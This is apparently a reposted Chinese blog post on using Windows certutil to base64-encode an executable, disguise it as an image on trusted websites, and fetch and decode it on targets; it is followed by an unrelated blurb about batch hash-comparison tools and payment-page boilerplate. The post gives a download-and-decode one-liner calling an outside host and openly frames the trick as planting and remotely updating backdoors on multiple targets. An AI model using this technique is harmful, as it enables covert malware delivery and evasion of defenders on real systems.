certutil在传输payload中的新奇技巧

好久没更新博客了,最近在实习的过程中还是见识到不少东西。

 

不多说,直接开始正文。

 

首先说一下certutil在渗透测试中用到的特别多,下载文件,计算hash,以及base64编码等等。

在这里介绍base64编码方式:

certutil.exe -encode .\MSGboxs.exe  pop.txt

 

-encode参数,可以将文件加密,并保存到pop.txt

生成后类似如下

再来安排一下图片

接着解密再用certutil解密

跟生成前的文件是一样的效果

可以将图片上传到安全的网站如Microsoft、Baidu、微博等不易发现的网站上

再通过这些网站进行传输文件

certutil.exe -urlcache -split -f http://chuantu.xyz/t6/702/1566812284x1031866013.jpg a.jpg && certutil.exe -decode a.jpg msg.exe

最好是上传有特定路径的网站上,如http://www.xxx.com/user/用户名.jpg

这样日后直接修改图片便可以更改多个目标上的后门程序。

生成后的文件是有开始结束标识的

-----BEGIN CERTIFICATE-----

-----END CERTIFICATE-----

 

所以可以搭配许多Web服务,直接读取其中的base64解密生成文件就可以了。

虽然隐蔽性不是很高,但作为传输后门中也不失为一种奇淫技巧。

转载于:https://www.cnblogs.com/wh4am1/p/11414078.html

这是两个用批处理方式实现的目录比较工具: 工具一:sha1comv3.bat 接受两个目录参数,计算两个目录里每个文件的 sha1 值,并给出报表文件 sha1v3.txt,使用方法: sha1comv3.bat 根据这 sha1comv3.bat 生成的报表文件 sha1v3.txt,可以找现两个目录 1:同名而且 sha1 相同的文件; 2:同名但是 sha1 不同的文件; 3:不同名但是 sha1 相同的文件; 4:同一目录不同名但是 sha1 相同的文件。 工具二:md5comv3.bat 接受两个目录参数,计算两个目录里每个文件的 md5 值,并给出报表文件 md5v3.txt,使用方法: md5omv3.bat 根据这 md5comv3.bat 生成的报表文件 md5v3.txt,可以找现两个目录 1:同名而且 md5 相同的文件; 2:同名但是 md5 不同的文件; 3:不同名但是 md5 相同的文件; 4:同一目录不同名但是 md5 相同的文件。 注意事项: 1:sha1comv3.bat 和 md5comv3.bat 都不接受路径带有空格的目录名,但是可以接受带有空格的文件名; 2:sha1 和 md5 的计算由 md5sum.exe 和 sha1sum.exe 完成,libiconv2.dll 和 libintl3.dll 是两个可执行文件需要的动态库; 3:sha1comv3.bat 和 md5comv3.bat 运行时会产生大量临时文件,这些文件由工具自动维护,不必手工清理。 这两个工具都是命令行方式、文本界面的,对于习惯使用图形界面的朋友来说,可能不方便,因此,不推荐习惯使用图形界面的朋友使用。 有问题请写邮件到 rubble@126.com。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值